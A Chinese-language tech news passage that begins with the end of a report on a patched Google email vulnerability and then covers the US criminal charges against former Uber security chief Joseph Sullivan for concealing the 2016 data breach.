都是谷歌独有,如果漏洞未得到及时修补,其很有可能被恶意邮件发送者滥用。庆幸的是,通过在服务器端部署缓解措施,用户这边无需执行任何附加操作。     (稿源:cnBeta,封面源自网络)

Uber 前首席安全官因隐瞒黑客事件遭美司法部起诉

本周四,Uber前首席安全官约瑟夫·沙利文(Joseph Sullivan)受到刑事指控,罪名是试图隐瞒2016年的一次黑客攻击。当时的攻击导致Uber大约5700万用户和司机的个人信息泄露。值得注意的是,这样的诉讼尚没有先例。 美国司法部指控52岁的沙利文犯有妨碍司法公正的重罪。诉讼称,在黑客攻击发生后,美国联邦贸易委员会(FC)开始监督Uber的信息安全工作,但他采取“蓄意的措施”,妨碍FTC了解相关信息。 这起案件是企业的信息安全人员首次被指控隐瞒黑客攻击活动。 沙利文本人曾是美国联邦检察官。他根据Uber的信息安全研究者漏洞报告奖励计划,向黑客支付了10万美元。到目前为止,这是Uber奖励计划支付的最高奖金,但这一项目原本并不覆盖敏感数据被盗事件。 沙利文此前曾是Facebook的信息安全负责人,目前在Cloudflare担任首席信息安全官。 在此前的采访中,信息安全人员表示,Uber支付这笔钱是为了迫使黑客公开接受奖金,并确保数据,尤其是平台司机的驾照信息被销毁。 起诉书称,沙利文让黑客签署了保密协议,谎称他们没有窃取数据。此外,Uber时任CEO的特拉维斯·卡兰尼克(Travis Kalanick)知晓沙利文的行为。 卡兰尼克的发言人拒绝对此置评。沙利文的发言人表示,沙利文正在与同事就本案展开合作,具体信息由司法部门披露。 沙利文的发言人布拉德·威廉姆斯(Brad Williams)说:“如果不是沙利文和他团队的努力,很可能我们永远都不会知道,什么人应该为此事件负责。” 卡兰尼克的继任者、Uber现任CEO达拉·科斯罗沙西(Dara Khosrowshahi)披露了这笔奖金,并在确定违规程度后辞退了沙利文及他的副手。Uber随后支付1.48亿美元,以了结在美国所有50个州和华盛顿特区遭遇的指控。 对于许多与黑客直接打交道的公司来说,Uber这起案件非常值得关注。许多公司都制定了类似的漏洞报告奖励计划,这些计划通常被视为提高信息安全水平的工具,并为黑客提供法律框架内的奖励。然而,有些参与者并没有遵守规则。 美国联邦调查局(FBI)指出,在Uber的案件中,两名主要的黑客继续攻击其他公司。如果沙利文首先报告司法部门,那么这种情况本可以避免。这两名黑客已经认罪,正在等待法庭判决。     (稿源:新浪科技,封面源自网络)